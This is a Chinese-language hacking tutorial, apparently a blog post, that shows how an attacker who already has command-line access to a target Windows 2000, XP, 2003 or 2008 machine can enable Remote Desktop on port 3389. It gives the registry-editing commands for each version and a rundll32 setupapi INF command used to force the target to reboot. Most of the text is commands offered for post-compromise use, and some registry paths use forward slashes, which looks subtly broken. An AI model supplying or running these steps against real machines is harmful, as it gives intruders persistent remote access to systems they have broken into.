很多人在拿到cmd权限后不知道该怎么用了,利用方式无非是添加账户,开3389,提权等等
今天说一下cmd开3389,非常简单,首先说一下2008服务器的,因为现在2008服务器子在业内里面还是利用的非常多的,网上很多的教程,有的需要重启,今天给大家说一下怎么cmd开3389.
Windows 2008
首先看到目标机器没有开启3389远程服务,插入以下代码
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo
"fDenyTSConnections"
=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo
"PortNumber"
=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo
"PortNumber"
=dword:00000d3d >>3389.reg
再在cmd输入 regedit /s 3389.reg 执行
Windows XP
首先是XP,没有开启3389,插入代码
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Windows 2003
echo Windows Registry Editor Version 5.00 >3389.reg echo. >>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg echo "fDenyTSConnections"=dword:00000000 >>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg echo "PortNumber"=dword:00000d3d >>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg echo "PortNumber"=dword:00000d3d >>3389.reg regedit /s 3389.reg
Windows 2000
echo Windows Registry Editor Version 5.00 >3389.reg echo. >>3389.reg echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg echo "Enabled"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg echo "ShutdownWithoutLogon"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg echo "TSEnabled"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg echo "Start"=dword:00000002 >>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg echo "Start"=dword:00000002 >>3389.reg echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg echo "Hotkey"="1" >>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg regedit /s 3389.reg
目标重启
@ECHO OFF & cd/d %temp% & echo [version] > {out}.inf (set inf=InstallHinfSection DefaultInstall) echo signature=$chicago$ >> {out}.inf echo [defaultinstall] >> {out}.inf rundll32 setupapi,%inf% 1 %temp%/{out}.inf
其他的后期测试补充!
文章评论